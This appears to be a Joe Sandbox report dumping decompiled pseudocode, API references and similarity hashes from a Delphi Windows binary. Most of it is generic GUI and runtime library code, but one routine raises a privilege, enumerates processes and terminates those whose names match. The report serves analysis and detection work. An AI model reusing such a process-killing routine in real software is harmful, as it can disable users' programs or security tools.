                                                                                                                                                                                                                            				intOrPtr _v89;
                                                                                                                                                                                                                            				intOrPtr _v93;
                                                                                                                                                                                                                            				void _v97;
                                                                                                                                                                                                                            				void* _t44;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				struct HPALETTE__* _t56;
                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				struct HDC__* _t74;
                                                                                                                                                                                                                            				intOrPtr _t95;
                                                                                                                                                                                                                            				void* _t105;
                                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                                            				void* _t108;
                                                                                                                                                                                                                            				intOrPtr _t110;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t105 = _t107;
                                                                                                                                                                                                                            				_t108 = _t107 + 0xffffffa0;
                                                                                                                                                                                                                            				_t70 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t44 = E00429FC8(_v8);
                                                                                                                                                                                                                            				if(_t70 == _t44) {
                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                            					return _t44;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t46 = _t70 - 1;
                                                                                                                                                                                                                            					if(_t46 < 0) {
                                                                                                                                                                                                                            						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if(_t46 == 7) {
                                                                                                                                                                                                                            							_t49 =  *0x49d90c; // 0x422ec0
                                                                                                                                                                                                                            							_t44 = E00425F28(_t49);
                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E004032B4( &_v97, 0x54);
                                                                                                                                                                                                                            							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
                                                                                                                                                                                                                            							_t110 = _t108 + 0xc;
                                                                                                                                                                                                                            							_v13 = 0;
                                                                                                                                                                                                                            							_v77 = 0;
                                                                                                                                                                                                                            							_v73 = 0x28;
                                                                                                                                                                                                                            							_v69 = _v93;
                                                                                                                                                                                                                            							_v65 = _v89;
                                                                                                                                                                                                                            							_v61 = 1;
                                                                                                                                                                                                                            							_v59 =  *0x0049B8B3 & 0x000000ff;
                                                                                                                                                                                                                            							_t55 =  *((intOrPtr*)(_t54 + 0x10));
                                                                                                                                                                                                                            							_v12 =  *((intOrPtr*)(_t54 + 0x10));
                                                                                                                                                                                                                            							_t72 = _t70 - 2;
                                                                                                                                                                                                                            							if(_t72 == 0) {
                                                                                                                                                                                                                            								_t56 =  *0x49e894; // 0x5e080725
                                                                                                                                                                                                                            								_v12 = _t56;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t73 = _t72 - 1;
                                                                                                                                                                                                                            								if(_t73 == 0) {
                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                            									L00407638();
                                                                                                                                                                                                                            									_t74 = E00426060(_t55);
                                                                                                                                                                                                                            									_v12 = CreateHalftonePalette(_t74);
                                                                                                                                                                                                                            									_v13 = 1;
                                                                                                                                                                                                                            									_push(_t74);
                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                            									L00407888();
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									if(_t73 == 2) {
                                                                                                                                                                                                                            										_v57 = 3;
                                                                                                                                                                                                                            										_v33 = 0xf800;
                                                                                                                                                                                                                            										_v29 = 0x7e0;
                                                                                                                                                                                                                            										_v25 = 0x1f;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *[fs:eax] = _t110;
                                                                                                                                                                                                                            							 *((char*)(_v8 + 0x22)) = E00429AA8( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x42afd9, _t105),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
                                                                                                                                                                                                                            							_pop(_t95);
                                                                                                                                                                                                                            							 *[fs:eax] = _t95;
                                                                                                                                                                                                                            							_push(0x42afe0);
                                                                                                                                                                                                                            							if(_v13 != 0) {
                                                                                                                                                                                                                            								return DeleteObject(_v12);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                            0x0042af7a
                                                                                                                                                                                                                            0x0042af81
                                                                                                                                                                                                                            0x0042af81
                                                                                                                                                                                                                            0x0042af39
                                                                                                                                                                                                                            0x0042af34
                                                                                                                                                                                                                            0x0042af93
                                                                                                                                                                                                                            0x0042afb9
                                                                                                                                                                                                                            0x0042afbe
                                                                                                                                                                                                                            0x0042afc1
                                                                                                                                                                                                                            0x0042afc4
                                                                                                                                                                                                                            0x0042afcd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042afd3
                                                                                                                                                                                                                            0x0042afd8
                                                                                                                                                                                                                            0x0042afd8
                                                                                                                                                                                                                            0x0042aeb2
                                                                                                                                                                                                                            0x0042aeae

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0042AF49
                                                                                                                                                                                                                            • CreateHalftonePalette.GDI32(00000000,00000000), ref: 0042AF56
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000), ref: 0042AF65
                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0042AFD3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380CreateDeleteHalftoneObjectPalette
                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                            • API String ID: 733450718-3887548279
                                                                                                                                                                                                                            • Opcode ID: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                                                                                                                                                                                            • Instruction ID: 2a0d3ada1f03d7f2548bc3f3360be5a611323719477d61fc332258d066da6c8f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE41F470B04208DFDB00DFA8D585B9EB7F6EF49304F9140AAE804A7391C67C5E15DB8A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E00475A94(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                            				long _v296;
                                                                                                                                                                                                                            				char _v304;
                                                                                                                                                                                                                            				char _v308;
                                                                                                                                                                                                                            				char _v312;
                                                                                                                                                                                                                            				char _v316;
                                                                                                                                                                                                                            				char _v320;
                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_v308 = 0;
                                                                                                                                                                                                                            				_v316 = 0;
                                                                                                                                                                                                                            				_v320 = 0;
                                                                                                                                                                                                                            				_v312 = 0;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				_push(_t81);
                                                                                                                                                                                                                            				_push(0x475bd5);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t81 + 0xfffffec4;
                                                                                                                                                                                                                            				E00475958("SeSystemProfilePrivilege", __ebx, 1, __edi, __esi);
                                                                                                                                                                                                                            				_t60 = E00472B20(2, 0);
                                                                                                                                                                                                                            				_t84 = _t60 - 0xffffffff;
                                                                                                                                                                                                                            				if(_t84 != 0) {
                                                                                                                                                                                                                            					_v304 = 0x128;
                                                                                                                                                                                                                            					E00472B40(_t60,  &_v304);
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						E00404C30( &_v312, 0x104,  &_v268);
                                                                                                                                                                                                                            						E00408DE4(_v312, 0x104,  &_v308);
                                                                                                                                                                                                                            						_push(_v308);
                                                                                                                                                                                                                            						E00404BB8( &_v320, E00404E80(_v8));
                                                                                                                                                                                                                            						E00408DE4(_v320, 0x104,  &_v316);
                                                                                                                                                                                                                            						_pop(_t50);
                                                                                                                                                                                                                            						E00404DCC(_t50, _v316);
                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                            							_t78 = OpenProcess(1, 0, _v296);
                                                                                                                                                                                                                            							TerminateProcess(_t78, 0);
                                                                                                                                                                                                                            							CloseHandle(_t78);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t53 = E00472B60(_t60,  &_v304);
                                                                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                                                                            					} while (_t53 + 1 != 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				CloseHandle(_t60);
                                                                                                                                                                                                                            				_pop(_t67);
                                                                                                                                                                                                                            				 *[fs:eax] = _t67;
                                                                                                                                                                                                                            				_push(0x475bdc);
                                                                                                                                                                                                                            				E004049E4( &_v320, 4);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            0x00475b89
                                                                                                                                                                                                                            0x00475b96
                                                                                                                                                                                                                            0x00475b9e
                                                                                                                                                                                                                            0x00475ba1
                                                                                                                                                                                                                            0x00475b0c
                                                                                                                                                                                                                            0x00475baa
                                                                                                                                                                                                                            0x00475bb1
                                                                                                                                                                                                                            0x00475bb4
                                                                                                                                                                                                                            0x00475bb7
                                                                                                                                                                                                                            0x00475bc7
                                                                                                                                                                                                                            0x00475bd4

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00475958: GetCurrentProcess.KERNEL32(00000028,?,00000000,00475A82), ref: 00475998
                                                                                                                                                                                                                              • Part of subcall function 00475958: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,00475A82), ref: 0047599E
                                                                                                                                                                                                                              • Part of subcall function 00475958: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 004759C8
                                                                                                                                                                                                                              • Part of subcall function 00475958: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?,00000000,00475A2E,?,00000000,00000028,?,00000000,00475A82), ref: 00475A12
                                                                                                                                                                                                                              • Part of subcall function 00475958: CloseHandle.KERNEL32(?,00475A35,00000000,00000028,?,00000000,00475A82), ref: 00475A28
                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00475B79
                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,?), ref: 00475B83
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,?), ref: 00475B89
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00475BD5), ref: 00475BAA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • SeSystemProfilePrivilege, xrefs: 00475AD4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process$CloseHandle$OpenToken$AdjustCurrentLookupPrivilegePrivilegesTerminateValue
                                                                                                                                                                                                                            • String ID: SeSystemProfilePrivilege
                                                                                                                                                                                                                            • API String ID: 529513329-1276405716
                                                                                                                                                                                                                            • Opcode ID: 75f4e8ad18347cc1a87371820c2482e5846d8527a850ee217239de5900a55147
                                                                                                                                                                                                                            • Instruction ID: 580ab526c7a6c82e50ebcca5458142647b940d84bf333f31e065c70003e8480a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75f4e8ad18347cc1a87371820c2482e5846d8527a850ee217239de5900a55147
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D93132709006189BDB20EB66CD82BDDB3B5AF85314F1085FAF50CB6291DA786F45CF98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E00422C88(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                                                                                                                                                                                                            				struct _WNDCLASSA _v44;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t6;
                                                                                                                                                                                                                            				CHAR* _t8;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t9;
                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t13;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t19;
                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                            				struct HWND__* _t22;
                                                                                                                                                                                                                            				CHAR* _t24;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t6 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				 *0x49b5dc = _t6;
                                                                                                                                                                                                                            				_t8 =  *0x49b5f0; // 0x422c78
                                                                                                                                                                                                                            				_t9 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				_t11 = _t10 + 1;
                                                                                                                                                                                                                            				if(_t11 == 0 || L00407540 != _v44.lpfnWndProc) {
                                                                                                                                                                                                                            					if(_t11 != 0) {
                                                                                                                                                                                                                            						_t19 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            						_t20 =  *0x49b5f0; // 0x422c78
                                                                                                                                                                                                                            						UnregisterClassA(_t20, _t19);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					RegisterClassA(0x49b5cc);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t13 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				_t24 =  *0x49b5f0; // 0x422c78
                                                                                                                                                                                                                            				_t22 = E00407A8C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
                                                                                                                                                                                                                            				if(_a6 != 0) {
                                                                                                                                                                                                                            					SetWindowLongA(_t22, 0xfffffffc, E00422BCC(_a4, _a8));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t22;
                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                                                                                                            • String ID: x,B
                                                                                                                                                                                                                            • API String ID: 4025006896-71347176
                                                                                                                                                                                                                            • Opcode ID: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                                                                                                                                                                                            • Instruction ID: 5edbcaf682720338496e3359f8b598ec737c219f81609156ea6670bddb9c1a51
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0018E71744204BBDB00EB6AED81F9A7399EB28718F544137F904E73A1D679AC40CBAD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E0042572C(void* __ecx, void* __edx) {
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				intOrPtr _t19;
                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t40 = __edx;
                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                            				if(__edx != 0) {
                                                                                                                                                                                                                            					_t51 = _t51 + 0xfffffff0;
                                                                                                                                                                                                                            					_t19 = E00403F10(_t19, _t50);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t38 = _t40;
                                                                                                                                                                                                                            				_t46 = _t19;
                                                                                                                                                                                                                            				E00403BBC(0);
                                                                                                                                                                                                                            				_t1 = _t46 + 0x38; // 0x38
                                                                                                                                                                                                                            				L00407198();
                                                                                                                                                                                                                            				_t47 = E00424C3C(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t46 + 0xc)) = _t47;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t47 + 0xc)) = _t46;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t47 + 8)) = 0x425eb0;
                                                                                                                                                                                                                            				_t5 = _t46 + 0x38; // 0x38
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t47 + 0x14)) = _t5;
                                                                                                                                                                                                                            				_t48 = E00425168(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t46 + 0x10)) = _t48;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t48 + 0xc)) = _t46;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t48 + 8)) = 0x425ed0;
                                                                                                                                                                                                                            				_t10 = _t46 + 0x38; // 0x38
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t48 + 0x14)) = _t10;
                                                                                                                                                                                                                            				_t49 = E00425434(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t46 + 0x14)) = _t49;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t49 + 0xc)) = _t46;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t49 + 8)) = 0x425ef0;
                                                                                                                                                                                                                            				_t15 = _t46 + 0x38; // 0x38
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t49 + 0x14)) = _t15;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t46 + 0x20)) = 0xcc0020;
                                                                                                                                                                                                                            				_t32 =  *0x4257ec; // 0x0
                                                                                                                                                                                                                            				 *((char*)(_t46 + 8)) = _t32;
                                                                                                                                                                                                                            				_t33 =  *0x49e8ec; // 0x2210b08
                                                                                                                                                                                                                            				E0041AFE4(_t33, _t38, _t39, _t46, _t49);
                                                                                                                                                                                                                            				_t35 = _t46;
                                                                                                                                                                                                                            				if(_t38 != 0) {
                                                                                                                                                                                                                            					E00403F68(_t35);
                                                                                                                                                                                                                            					_pop( *[fs:0x0]);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t46;
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlInitializeCriticalSection.KERNEL32(vas,00428B00,?,00000001,00428C96,?,?,?,00429F01,?,?,00429D20,?,0000000E,00000000,?), ref: 0042574C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalInitializeSection
                                                                                                                                                                                                                            • String ID: h7B$h8B$vas$5B
                                                                                                                                                                                                                            • API String ID: 32694325-2931570110
                                                                                                                                                                                                                            • Opcode ID: bd3b095f9042d2604a0f53fc41302a85decb916e5816816f9a96bdd2596773ca
                                                                                                                                                                                                                            • Instruction ID: 3f3694d375962d4255fc29ac861639cc4656e31162b1a28f9c4b0cd7577d53a2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd3b095f9042d2604a0f53fc41302a85decb916e5816816f9a96bdd2596773ca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9118EB1A01B129FC320EF2AE840985FBF9BF84314384853FE449C7B11D779A9558B94
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E0044E150(intOrPtr* __eax) {
                                                                                                                                                                                                                            				struct tagMENUITEMINFOA _v128;
                                                                                                                                                                                                                            				intOrPtr _v132;
                                                                                                                                                                                                                            				int _t16;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				struct HMENU__* _t36;
                                                                                                                                                                                                                            				MENUITEMINFOA* _t37;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t37 =  &_v128;
                                                                                                                                                                                                                            				_t29 = __eax;
                                                                                                                                                                                                                            				_t16 =  *0x49de44; // 0x49e744
                                                                                                                                                                                                                            				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                                                                                                                                                                                                            					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                                                                                                                                                                                                            					_t37->cbSize = 0x2c;
                                                                                                                                                                                                                            					_v132 = 0x10;
                                                                                                                                                                                                                            					_v128.hbmpUnchecked =  &(_v128.cch);
                                                                                                                                                                                                                            					_v128.dwItemData = 0x50;
                                                                                                                                                                                                                            					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                                                                                                                                                                            					if(_t16 != 0) {
                                                                                                                                                                                                                            						_t16 = E0044E4D4(_t29);
                                                                                                                                                                                                                            						asm("sbb edx, edx");
                                                                                                                                                                                                                            						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                                                                                                                                                                                                            							_v128.cbSize = ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) + ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                                                                                                                                                                                                            							_v132 = 0x10;
                                                                                                                                                                                                                            							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                                                                                                                                                                            							if(_t16 != 0) {
                                                                                                                                                                                                                            								return DrawMenuBar( *(_t29 + 0x38));
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t16;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMenuItemInfoA.USER32 ref: 0044E19E
                                                                                                                                                                                                                            • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044E1F0
                                                                                                                                                                                                                            • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0044E1FD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                            • String ID: DI$P
                                                                                                                                                                                                                            • API String ID: 3227129158-1383934172
                                                                                                                                                                                                                            • Opcode ID: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                                                                                                                                                                                            • Instruction ID: 3c7080e089ef200bda1d0293621365d90923fd6ea2d15a2cda29d63b16e16469
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B1190716052006BE3109B29CC85B4A76D8BB85324F14866AF5A4CB3DAD679D844C74A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E00403A5C() {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                            				signed short _t12;
                                                                                                                                                                                                                            				signed short _t14;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t29 = _t31;
                                                                                                                                                                                                                            				_t32 = _t31 + 0xfffffff4;
                                                                                                                                                                                                                            				_v12 =  *0x49b024 & 0x0000ffff;
                                                                                                                                                                                                                            				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                                                                                                                                                            					_t12 =  *0x49b024; // 0x1372
                                                                                                                                                                                                                            					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                                                                                                                                                                            					 *0x49b024 = _t14;
                                                                                                                                                                                                                            					return _t14;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(_t29);
                                                                                                                                                                                                                            					_push(E00403ACD);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t32;
                                                                                                                                                                                                                            					_v16 = 4;
                                                                                                                                                                                                                            					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                                                                                                                                                            					_pop(_t27);
                                                                                                                                                                                                                            					 *[fs:eax] = _t27;
                                                                                                                                                                                                                            					_push(0x403ad4);
                                                                                                                                                                                                                            					return RegCloseKey(_v8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
